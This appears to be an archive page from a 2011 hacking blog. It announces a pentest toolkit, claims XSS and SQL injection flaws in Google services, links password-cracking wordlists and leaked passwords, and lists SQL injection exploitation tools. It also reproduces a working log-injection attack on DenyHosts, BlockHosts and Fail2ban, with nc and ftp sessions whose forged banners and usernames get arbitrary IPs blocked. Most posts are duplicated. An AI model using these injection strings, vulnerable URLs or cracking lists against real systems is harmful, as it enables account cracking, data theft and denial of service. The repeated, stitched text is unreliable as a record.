... neuere Einträge
Thursday, 30. June 2011
Inguma v.0.3 Linux
Am Thursday, 30. Jun 2011 im Topic 'Pentest'
A Free Penetration Testing And Vulnerability Research Toolkit
Inguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, brute force user names and passwords and, of course, exploits.
Some minor features added are:
- An icon has been added to graph nodes to show the OS of the target when available.
- New autosave feature that will save the KB after every module execution to prevent data loss in case of GUI crash. This autosaved KB will be loaded at startup if the user wants.
- Single host report option added to the node menu.
- Improved performance of ping and scan modules.
- More modules have been ported to the GUI, like "identify"; wich has also been added to the list of modules launched on adding a target.
- We are now closer to full Windows compatibility
Download: http://www.inguma-framework.org/projects/inguma/files
Inguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, brute force user names and passwords and, of course, exploits.
Some minor features added are:
- An icon has been added to graph nodes to show the OS of the target when available.
- New autosave feature that will save the KB after every module execution to prevent data loss in case of GUI crash. This autosaved KB will be loaded at startup if the user wants.
- Single host report option added to the node menu.
- Improved performance of ping and scan modules.
- More modules have been ported to the GUI, like "identify"; wich has also been added to the list of modules launched on adding a target.
- We are now closer to full Windows compatibility
Download: http://www.inguma-framework.org/projects/inguma/files
google plus vuln to XSS
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
pathric due found that google plus application have a parameter thats vulnerable to
XSS
https://plus.google.com/up/start/?sw=1&type=st?p=XSS vuln parameter
http://din.gy./xLSlj
http://din.gy./xLSlj
XSS
https://plus.google.com/up/start/?sw=1&type=st?p=XSS vuln parameter
http://din.gy./xLSlj
http://din.gy./xLSlj
SQL Injection Vulnerability in Google Lab Database System
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
Hackers Release Step by step proof about this Vulnerability
1. Website : www.googlelabs.com or labs.google.com
2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer
Video Download link: http://www.bdcyberarmy.com/Google/google_video.avi
1. Website : www.googlelabs.com or labs.google.com
2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer
Video Download link: http://www.bdcyberarmy.com/Google/google_video.avi
Dictionaries & Wordlists
Am Thursday, 30. Jun 2011 im Topic 'Dictionaries & Wordlists '
Collection of Wordlist v.2 374806023
(3.9GB / 539MB) Part 1, Part 2, Part 3 5510122c3c27c97b2243208ec580cc67
http://thepiratebay.org/torrent/6300469/Collection_of_Wordlist_%28Dictionaries%29___V.2_NEW____for_Cracking_
http://www.mediafire.com/download.php?e5v4q79yf7d5r3a
http://www.mediafire.com/download.php?o8ri742gair8g6d
http://www.mediafire.com/download.php?7w695b1k1b1b903
HuegelCDC 53059218
(508MB / 64MB) Part 1 52f42b3088fcb508ddbe4427e8015be6
http://www.megaupload.com/?d=SNK18CU0
http://www.mediafire.com/?blvzrvqlrvrm0ny
Naxxatoe-Dict-Total-New 4239459985
(25GB / 1.1GB) Part 1, Part 2, Part 3
Part 4, Part 5, Part 6 e52d0651d742a7d8eafdb66283b75e12
http://diablohorn.wordpress.com/2010/03/21/gotta-love-compression/
http://www.mediafire.com/download.php?kvntczux7i5bo2c
http://www.mediafire.com/download.php?3czep4kxmso1kd7
http://www.mediafire.com/download.php?twdlv7tf9f0xbdg
http://www.mediafire.com/download.php?cct41buudrcy0ss
http://www.mediafire.com/download.php?6oakueb1vhg414x
http://www.mediafire.com/download.php?8v3f64p6pd349ix
Purehates Word list 165824917
(1.7GB / 250MB) Part 1, Part 2 c5dd37f2b3993df0b56a0d0eba5fd948
http://h33t.com/details.php?id=178f55c67ca0f522831dbc67042a34983e6652f5
http://www.mediafire.com/download.php?98u8d4qe803erm8
http://www.mediafire.com/download.php?dvi0bjbhxkn05hl
theargonlistver1 4865840
(52MB / 15MB) Part 1 b156e46eab541ee296d1be3206b0918d
http://www.mediafire.com/?fmz1q3nhnz0
http://www.mediafire.com/download.php?mwu8ivr0nqn5eeq
theargonlistver2 46428068
(297MB / 32MB) Part 1 41227b1698770ea95e96b15fd9b7fc6a
http://thepiratebay.org/torrent/3833663/The_Argon_list_ver.2_Password_dictionary_2.3gig_Jo-Psyko_
http://www.mediafire.com/download.php?ixcih9rgrczrpmj
theargonlistver2-v2 (word.lst.s.u.john.s.u.200) 244752784
(2.2GB / 219MB) Part 1, Part 2 36f47a35dd0d995c8703199a09513259
http://rapidshare.com/files/98912262/theargonlistver2_wordlist.zip.html
http://www.mediafire.com/download.php?yj31a3ic2zohai3
http://www.mediafire.com/download.php?x9ejmh9yp71dh8r
WordList Collection 472603140
(4.9GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 a76e7b1d80ae47909b5a0baa4c414194
http://www.torrentroom.com/torrent/3074471-WordList-Collection.html#b3
http://www.mediafire.com/download.php?mbu3mdl2mzi227h
http://www.mediafire.com/download.php?z3jjaq3pe384yvl
http://www.mediafire.com/download.php?wt7qqt57d4rp0kv
http://www.mediafire.com/download.php?8zglksb3k7b7746
http://www.mediafire.com/download.php?9yjzcprc76ats4g
http://www.mediafire.com/download.php?pxm1a3muicyrkyr
http://www.mediafire.com/download.php?98p2jdlph15a8b9
wordlist-final 8287890
(80MB / 19MB) Part 1 db2de90185af33b017b00424aaf85f77
http://torrentz.eu/87e820583d71a3bb7d43e2a3b1d4eb3d7231e606
http://www.mediafire.com/download.php?nb4j6b4p2c2f5kv
wordlists-sorted 65581967
(687MB / 168MB) Part 1 2537a72f729e660d87b4765621b8c4bc
http://diablohorn.tbhost.eu/distribute/wordlists-sorted.gz.torrent
http://www.mediafire.com/download.php?6356dax1xi6c2ct
wpalist 37520637
(422MB / 66MB) Part 1 9cb032c0efc41f2b377147bf53745fd5
http://www.megaupload.com/?d=7RN6ZB2E
WPA-PSK WORDLIST (40 MB) 2829412
(32MB / 8.7MB) Part 1 de45bf21e85b7175cabb6e41c509a787
http://thepiratebay.org/torrent/4428301/
http://www.mediafire.com/download.php?ko3k5waryr254gq
WPA-PSK WORDLIST 2 (107 MB) 5062241
(55MB / 15MB) Part 1 684c5552b307b4c9e4f6eed86208c991
http://thepiratebay.org/torrent/4433853/WPA-PSK_WORDLIST_2_%28107_MB%29.rar
http://www.mediafire.com/download.php?ccdqo2s6ar75320
WPA-PSK WORDLIST 3 Final (13 GB) 611419293
(6.8GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 58747c6dea104a48016a1fbc97942c14
http://thepiratebay.org/torrent/5945498/WPA-PSK_WORDLIST_3_Final_%2813_GB%29.rar
http://www.mediafire.com/download.php?beyf2gbs07wl6zn
http://www.mediafire.com/download.php?scc21q07rdaamzd
http://www.mediafire.com/download.php?urcrd1lk1bjts1e
http://www.mediafire.com/download.php?k74hl5ud35ytzzv
http://www.mediafire.com/download.php?yras8iih4739hlt
http://www.mediafire.com/download.php?e8ycntc5qnsxbnn
http://www.mediafire.com/download.php?i7apnn6rgpal937
-=Xploitz=- Vol 1 - PASSWORD DVD 100944487
(906MB / 109MB) Part 1 38eae1054a07cb894ca5587b279e39e4
http://thepiratebay.org/torrent/4017231/
http://www.mediafire.com/download.php?pjs2s64pj0uw66f
-=Xploitz=- Vol 2 - Master Password Collection 87565344
(1.1GB / 158MB) Part 1 53f0546151fc2c74c8f19a54f9c17099
http://www.backtrack-linux.org/forums/old-general-discussion/8603-=xploitz=-2-master-password-collections.html
http://www.mediafire.com/download.php?n3ofy96p5lbkvr3
-=Xploitz Pirates=- Masters Password Collection #1! -- Optimized 79523622
(937MB / 134MB) Part 1 6dd2c32321161739563d0e428f5362f4
http://thepiratebay.org/torrent/5079163
http://www.mediafire.com/download.php?rjqlmfkokn5fpzq
17-in-1 5341231112
(37GB / 4.5GB) Part 1 - Part 24 d1f8abd4cb16d2280efb34998d41f604
http://www.mediafire.com/?k3j1ngab1bg3m
18-in-1 5343814622
(37GB / 4.5GB) Part 1 - Part 24 aee6d1a230fdad3b514a02eb07a95226
http://www.mediafire.com/?t150bv7govzsr
18-in-1 [WPA Edition] 1130701596
(12.6GB / 2.9GB) Part 1 - Part 15
425d47c549232b62dbb0e71b8394e9d9
http://www.mediafire.com/?lpkepzdz3mmg0
36GB wordlist that can be very very useful for cracking accounts
compression, it's "only" 723MB
http://www.megaupload.com/?d=7ZLNVV8D
Openwall Wordlists Collection CD
Included in this collection are wordlists for 20+ human languages and lists of common passwords. The included languages are: Afrikaans, Croatian, Czech, Danish, Dutch, English, Finnish, French, German, Hungarian, Italian, Japanese, Latin, Norwegian, Polish, Russian, Spanish, Swahili, Swedish, Turkish, and Yiddish. There's also a list of the common passwords and unique words for all the languages combined in one file (over 40 MB for almost 4 million entries).
http://www.megaupload.com/?d=Y5OPKI21
It has ~1 Billion WPA optimized passwords.
http://thepiratebay.org/torrent/5945498/WPA-PSK_WORDLIST_3_Final_(13_GB).rar
Here is the list of 1,717,681 passwords:
http://dazzlepod.com/site_media/txt/passwords.txt
UNIQPASS Free 2 million randomly selected passwords (18.9MB).
http://dazzlepod.com/site_media/txt/uniqpass_preview.txt
1.5GB_Wordlist_by_MAsH
http://svn.isdpodcast.com/wordlists/1.5GB_Wordlist_by_MAsH.txt.tar.gz
1 Password dictionaries
2 Leaked passwords
2.1 Statistics
3 Miscellaneous non-hacking dictionaries
3.1 Facebook lists
http://www.skullsecurity.org/wiki/index.php/Passwords
(3.9GB / 539MB) Part 1, Part 2, Part 3 5510122c3c27c97b2243208ec580cc67
http://thepiratebay.org/torrent/6300469/Collection_of_Wordlist_%28Dictionaries%29___V.2_NEW____for_Cracking_
http://www.mediafire.com/download.php?e5v4q79yf7d5r3a
http://www.mediafire.com/download.php?o8ri742gair8g6d
http://www.mediafire.com/download.php?7w695b1k1b1b903
HuegelCDC 53059218
(508MB / 64MB) Part 1 52f42b3088fcb508ddbe4427e8015be6
http://www.megaupload.com/?d=SNK18CU0
http://www.mediafire.com/?blvzrvqlrvrm0ny
Naxxatoe-Dict-Total-New 4239459985
(25GB / 1.1GB) Part 1, Part 2, Part 3
Part 4, Part 5, Part 6 e52d0651d742a7d8eafdb66283b75e12
http://diablohorn.wordpress.com/2010/03/21/gotta-love-compression/
http://www.mediafire.com/download.php?kvntczux7i5bo2c
http://www.mediafire.com/download.php?3czep4kxmso1kd7
http://www.mediafire.com/download.php?twdlv7tf9f0xbdg
http://www.mediafire.com/download.php?cct41buudrcy0ss
http://www.mediafire.com/download.php?6oakueb1vhg414x
http://www.mediafire.com/download.php?8v3f64p6pd349ix
Purehates Word list 165824917
(1.7GB / 250MB) Part 1, Part 2 c5dd37f2b3993df0b56a0d0eba5fd948
http://h33t.com/details.php?id=178f55c67ca0f522831dbc67042a34983e6652f5
http://www.mediafire.com/download.php?98u8d4qe803erm8
http://www.mediafire.com/download.php?dvi0bjbhxkn05hl
theargonlistver1 4865840
(52MB / 15MB) Part 1 b156e46eab541ee296d1be3206b0918d
http://www.mediafire.com/?fmz1q3nhnz0
http://www.mediafire.com/download.php?mwu8ivr0nqn5eeq
theargonlistver2 46428068
(297MB / 32MB) Part 1 41227b1698770ea95e96b15fd9b7fc6a
http://thepiratebay.org/torrent/3833663/The_Argon_list_ver.2_Password_dictionary_2.3gig_Jo-Psyko_
http://www.mediafire.com/download.php?ixcih9rgrczrpmj
theargonlistver2-v2 (word.lst.s.u.john.s.u.200) 244752784
(2.2GB / 219MB) Part 1, Part 2 36f47a35dd0d995c8703199a09513259
http://rapidshare.com/files/98912262/theargonlistver2_wordlist.zip.html
http://www.mediafire.com/download.php?yj31a3ic2zohai3
http://www.mediafire.com/download.php?x9ejmh9yp71dh8r
WordList Collection 472603140
(4.9GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 a76e7b1d80ae47909b5a0baa4c414194
http://www.torrentroom.com/torrent/3074471-WordList-Collection.html#b3
http://www.mediafire.com/download.php?mbu3mdl2mzi227h
http://www.mediafire.com/download.php?z3jjaq3pe384yvl
http://www.mediafire.com/download.php?wt7qqt57d4rp0kv
http://www.mediafire.com/download.php?8zglksb3k7b7746
http://www.mediafire.com/download.php?9yjzcprc76ats4g
http://www.mediafire.com/download.php?pxm1a3muicyrkyr
http://www.mediafire.com/download.php?98p2jdlph15a8b9
wordlist-final 8287890
(80MB / 19MB) Part 1 db2de90185af33b017b00424aaf85f77
http://torrentz.eu/87e820583d71a3bb7d43e2a3b1d4eb3d7231e606
http://www.mediafire.com/download.php?nb4j6b4p2c2f5kv
wordlists-sorted 65581967
(687MB / 168MB) Part 1 2537a72f729e660d87b4765621b8c4bc
http://diablohorn.tbhost.eu/distribute/wordlists-sorted.gz.torrent
http://www.mediafire.com/download.php?6356dax1xi6c2ct
wpalist 37520637
(422MB / 66MB) Part 1 9cb032c0efc41f2b377147bf53745fd5
http://www.megaupload.com/?d=7RN6ZB2E
WPA-PSK WORDLIST (40 MB) 2829412
(32MB / 8.7MB) Part 1 de45bf21e85b7175cabb6e41c509a787
http://thepiratebay.org/torrent/4428301/
http://www.mediafire.com/download.php?ko3k5waryr254gq
WPA-PSK WORDLIST 2 (107 MB) 5062241
(55MB / 15MB) Part 1 684c5552b307b4c9e4f6eed86208c991
http://thepiratebay.org/torrent/4433853/WPA-PSK_WORDLIST_2_%28107_MB%29.rar
http://www.mediafire.com/download.php?ccdqo2s6ar75320
WPA-PSK WORDLIST 3 Final (13 GB) 611419293
(6.8GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 58747c6dea104a48016a1fbc97942c14
http://thepiratebay.org/torrent/5945498/WPA-PSK_WORDLIST_3_Final_%2813_GB%29.rar
http://www.mediafire.com/download.php?beyf2gbs07wl6zn
http://www.mediafire.com/download.php?scc21q07rdaamzd
http://www.mediafire.com/download.php?urcrd1lk1bjts1e
http://www.mediafire.com/download.php?k74hl5ud35ytzzv
http://www.mediafire.com/download.php?yras8iih4739hlt
http://www.mediafire.com/download.php?e8ycntc5qnsxbnn
http://www.mediafire.com/download.php?i7apnn6rgpal937
-=Xploitz=- Vol 1 - PASSWORD DVD 100944487
(906MB / 109MB) Part 1 38eae1054a07cb894ca5587b279e39e4
http://thepiratebay.org/torrent/4017231/
http://www.mediafire.com/download.php?pjs2s64pj0uw66f
-=Xploitz=- Vol 2 - Master Password Collection 87565344
(1.1GB / 158MB) Part 1 53f0546151fc2c74c8f19a54f9c17099
http://www.backtrack-linux.org/forums/old-general-discussion/8603-=xploitz=-2-master-password-collections.html
http://www.mediafire.com/download.php?n3ofy96p5lbkvr3
-=Xploitz Pirates=- Masters Password Collection #1! -- Optimized 79523622
(937MB / 134MB) Part 1 6dd2c32321161739563d0e428f5362f4
http://thepiratebay.org/torrent/5079163
http://www.mediafire.com/download.php?rjqlmfkokn5fpzq
17-in-1 5341231112
(37GB / 4.5GB) Part 1 - Part 24 d1f8abd4cb16d2280efb34998d41f604
http://www.mediafire.com/?k3j1ngab1bg3m
18-in-1 5343814622
(37GB / 4.5GB) Part 1 - Part 24 aee6d1a230fdad3b514a02eb07a95226
http://www.mediafire.com/?t150bv7govzsr
18-in-1 [WPA Edition] 1130701596
(12.6GB / 2.9GB) Part 1 - Part 15
425d47c549232b62dbb0e71b8394e9d9
http://www.mediafire.com/?lpkepzdz3mmg0
36GB wordlist that can be very very useful for cracking accounts
compression, it's "only" 723MB
http://www.megaupload.com/?d=7ZLNVV8D
Openwall Wordlists Collection CD
Included in this collection are wordlists for 20+ human languages and lists of common passwords. The included languages are: Afrikaans, Croatian, Czech, Danish, Dutch, English, Finnish, French, German, Hungarian, Italian, Japanese, Latin, Norwegian, Polish, Russian, Spanish, Swahili, Swedish, Turkish, and Yiddish. There's also a list of the common passwords and unique words for all the languages combined in one file (over 40 MB for almost 4 million entries).
http://www.megaupload.com/?d=Y5OPKI21
It has ~1 Billion WPA optimized passwords.
http://thepiratebay.org/torrent/5945498/WPA-PSK_WORDLIST_3_Final_(13_GB).rar
Here is the list of 1,717,681 passwords:
http://dazzlepod.com/site_media/txt/passwords.txt
UNIQPASS Free 2 million randomly selected passwords (18.9MB).
http://dazzlepod.com/site_media/txt/uniqpass_preview.txt
1.5GB_Wordlist_by_MAsH
http://svn.isdpodcast.com/wordlists/1.5GB_Wordlist_by_MAsH.txt.tar.gz
1 Password dictionaries
2 Leaked passwords
2.1 Statistics
3 Miscellaneous non-hacking dictionaries
3.1 Facebook lists
http://www.skullsecurity.org/wiki/index.php/Passwords
ZeuS Source Code
Am Thursday, 30. Jun 2011 im Topic 'Source Code'
Stuxnet Decompiled Source code Dump
Am Thursday, 30. Jun 2011 im Topic 'Source Code'
Vulnerable programs
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
We used DenyHosts on our previous example, because it is one of the most famous tools out there, but it is not the only one vulnerable.
BlockHosts latest version (2.0.3) is also vulnerable to log injection via the vsftp and SSH logs. The reason is the same as DenyHosts: loose regular expressions.
root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client “2.3.4.54″
..
(looking at the logs)
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client “2.3.4.54″ ] FAIL LOGIN: Client “192.168.3.1″
If we pass a modified user name in order to inject an IP address, it will block
the fake supplied IP address instead of the valid one.
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 2.3.4.54 : deny
..
#—- BlockHosts Additions
With the SSH logs, the issue is the same as with DenyHosts. If we inject any data in the protocol identification field, BlockHosts will parse our fake ip addresses instead of the valid one (the exploit for DenyHosts will work with BlockHosts with just a slight change — as a reader exercise).
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
sshd[123]: User myself from 1.5.6.7 not allowed
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘sshd[123]: User myself from 1.5.6.7 not allowed ‘ from 10.1.1.14
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 1.5.6.7 : deny
..
#—- BlockHosts Additions
*BlockHosts author, Avinash Chopde, has released a patch for it.
Fail2ban latest version 0.8 is vulnerable to the same injection via SSH logs that DenyHosts and BlockHosts are. It looks for “ROOT LOGIN REFUSED” anywhere in the logs and as previously shown, we can easily inject that using the bad protocol identification message from ssh.
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
ROOT LOGIN REFUSED hi FROM 1.5.6.7
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘ROOT LOGIN REFUSED hi FROM 1.5.6.7 ‘ from 10.1.1.14
*Fail2ban author, Cyril Jaquier, has released a patch for it.
**This issue is similar to CVE-2006-6302, but using a different vector. Thanks to Cyril Jaquier for pointing it out to me.
BlockHosts latest version (2.0.3) is also vulnerable to log injection via the vsftp and SSH logs. The reason is the same as DenyHosts: loose regular expressions.
root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client “2.3.4.54″
..
(looking at the logs)
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client “2.3.4.54″ ] FAIL LOGIN: Client “192.168.3.1″
If we pass a modified user name in order to inject an IP address, it will block
the fake supplied IP address instead of the valid one.
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 2.3.4.54 : deny
..
#—- BlockHosts Additions
With the SSH logs, the issue is the same as with DenyHosts. If we inject any data in the protocol identification field, BlockHosts will parse our fake ip addresses instead of the valid one (the exploit for DenyHosts will work with BlockHosts with just a slight change — as a reader exercise).
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
sshd[123]: User myself from 1.5.6.7 not allowed
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘sshd[123]: User myself from 1.5.6.7 not allowed ‘ from 10.1.1.14
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 1.5.6.7 : deny
..
#—- BlockHosts Additions
*BlockHosts author, Avinash Chopde, has released a patch for it.
Fail2ban latest version 0.8 is vulnerable to the same injection via SSH logs that DenyHosts and BlockHosts are. It looks for “ROOT LOGIN REFUSED” anywhere in the logs and as previously shown, we can easily inject that using the bad protocol identification message from ssh.
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
ROOT LOGIN REFUSED hi FROM 1.5.6.7
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘ROOT LOGIN REFUSED hi FROM 1.5.6.7 ‘ from 10.1.1.14
*Fail2ban author, Cyril Jaquier, has released a patch for it.
**This issue is similar to CVE-2006-6302, but using a different vector. Thanks to Cyril Jaquier for pointing it out to me.
SQL Injection Scanners List
Am Thursday, 30. Jun 2011 im Topic 'Pentest'
WebRaider
Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using an extra channel such as TFTP, FTP to upload the initial payload.
Download
http://code.google.com/p/webraider/downloads/list
Download PDF
http://www.mavitunasecurity.com/s/research/OneClickOwnage.pdf
Havij Advanced SQL Injection
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users…..
e.g.
Havij v1.14
http://www.itsecteam.com/files/havij/Havij1.14Free.rar
Downlaod Help (pdf format)
http://www.itsecteam.com/files/havij/havij_help-english.pdf
Downlaod Help (chm format)
http://www.itsecteam.com/files/havij/havij_help-english.chm
Pangolin free edition released
Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool
for Website manager or IT Security analyst. Its goal is to detect and take
advantage of SQL injection vulnerabilities on web applications. Once it detects
one or more SQL injections on the target host, the user can choose among a
variety of options to perform an extensive back-end database management system
fingerprint, retrieve DBMS session user and database, enumerate users, password
hashes, privileges, databases, dump entire or users specific DBMS
tables/columns, run his own SQL statement, read specific files on the file
system and more.
Test many types of databases
Your web applications using Access,DB2,Informix,Microsoft SQL Server
2000,Microsoft SQL Server 2005,Microsoft SQL Server
2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase?
Pangolin supports all of them.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall
setting, Injection Digger, Data dumper, etc.
Download:
http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip
SQLIer
SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can't guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites.
An 8 character password (containing any character from decimal ASCII code 1-127) takes approximately 1 minute to crack.
Download:
http://bcable.net/releases.php?sqlier
SQID
SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities.
Download:
http://sqid.rubyforge.org/#download
FJ-Injector Framwork
FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation
Download:
http://sourceforge.net/projects/injection-fwk/files/
Safe3 Sql Injector
Features:
Full support for http, https website.
Full support for Basic, Digest, NTLM http authentications.
Full support for GET, Post, Cookie sql injection.
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
Powerful AI engine to automatic recognite injection type, database type, sql injection best way.
Support to enumerate databases, tables, columns and data.
Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
Support to ip domain query,web path guess,md5 crack etc.
Support for sql injection scan.
Download:
http://sourceforge.net/projects/safe3si/files/Safe3SI-8.1.rar/download
Sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
.Linux
.FreeBSD
.Mac OS X
It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:
.ICMP-based shell
.CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
.Header-based injection support
Download:
http://sqlninja.sourceforge.net/download.html
Sqlmap
is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.
Download
http://sqlmap.sourceforge.net/#download
Download Gui-for-sqlmap
http://code.google.com/p/gui-for-sqlmap/downloads/list
SQL Power Injector
is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page.
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.
Download
http://www.sqlpowerinjector.com/download.htm
Absinthe
is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.
Absinthe does not aid in the discovery of SQL Injection holes. This tool will only speed up the process of data recovery.
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.
Download
http://www.0x90.org/releases/absinthe/download.php
bsqlbf-v2:
This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
Download
http://code.google.com/p/bsqlbf-v2/downloads/list
Marathon Tool
Marathon Tool is a POC for using heavy queries to perform a Time-Based Blind SQL Injection attack. This tool is still work in progress but is right now in a very good alpha version to extract information from web applications using Microsoft SQL Server, Microsoft Access, MySQL or Oracle Databases.
Download
http://marathontool.codeplex.com/#
pysqlin
Pysqlin is a console python tool to exploit SQL Injection vulnerabilities. It has 3 main adaptable components via a plugin framework:
Plugin: Adds functionality to the main program.
Injector: Provides injection methods.
Filter: Allows to modify the final http request and DDBB query in order to perform any kind of transformation.
Implemented: Oracle, MySQL and Microsoft SQL Server.
Download
http://code.google.com/p/pysqlin/source/checkout
BSQL Hacker
BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.
Download
http://labs.portcullis.co.uk/application/bsql-hacker/
sqlus
sqlsus is an open source MySQL injection and takeover tool, written in perl.
Supports only MySQL.
Download
http://sqlsus.sourceforge.net/download.html
DarkMySQLi16.py
SQL Injection tool's by rsauron written in Python
Download
http://www.multiupload.com/NV6T2XOI1A
Source
darkc0de Crew
SQL TOOL
This is an auto SQL injection Tool. Supports MySQL & MsSQL. The Old SQL Tool will no longer be supported.
Download
http://sourceforge.net/projects/sqltool/files/SQL%20Tool.rar/download?_test=goal
mySQLenum
is a command line automatic blind sql injection tool for web application that uses MySql server as its back-end. Its main goal is to provide an easy to use command line interface.
Supports only MySQL
Download
http://sourceforge.net/projects/mysqlenum/files/mysqlenum-0.3.tar.gz/download?_test=goal
PRIAMOS
is a powerful SQL Injector & Scanner
You can search SQL Injection vulnerabilities and inject vulnerable string to get all
Databases, Tables and Column datas with injector module.
Supports only Microsoft SQL Server.
Download
http://www.priamos-project.com/versions.htm
SFX-SQLi
Supports only Microsoft SQL Server.
Download
http://www.kachakil.com/default.htm
yInjector
yInjector is a MySQL Injection penetration tool
Supports only MySQL.
Download
http://y-osirys.com/softwares/s-softwares/id10#subsec=s-softwares,id=10,title=yInjector%20-%20SQL%20Inj%20Penetration%20Tool
Bobcat
is a tool to aid a security consultant in taking full advantage of SQL injection vulnerabilities. It was originally created to build and extend upon the capabilities of a tool named "Data Thief".
Download
http://www.northern-monkee.co.uk/pub/bobcat.html
ExploitMyUnion
is a tool written in Python with a PyQt user interface made to automate sql injection exploitation.
Download
http://sourceforge.net/projects/exploitmyunion/files/v2.x/exploitmyunion-2.1_win32.zip/download?_test=goal
Laudanum
is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.
Download
http://sourceforge.net/projects/laudanum/files/laudanum-0.2/laudanum-0.2.tar.gz/download?_test=goal
Hexjector
is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.
Download
http://sourceforge.net/projects/hexjector/files/Hexjector%20%28Win32%29/Hexjector%20v1.0.7.4.zip/download?_test=goal
Toolza
UTF-8 perlsсriрt
SQL injection DB supported: Mysql, Mssql, Sybase, Postgresql, Access, Oracle, Firebird/Interbase
include Blind Mysql injection + alternative methods
Download
http://pastebin.com/QJ1MMiux
SQL TOOL
This is an auto SQL injection Tool. Supports MySQL & MsSQL.
Download
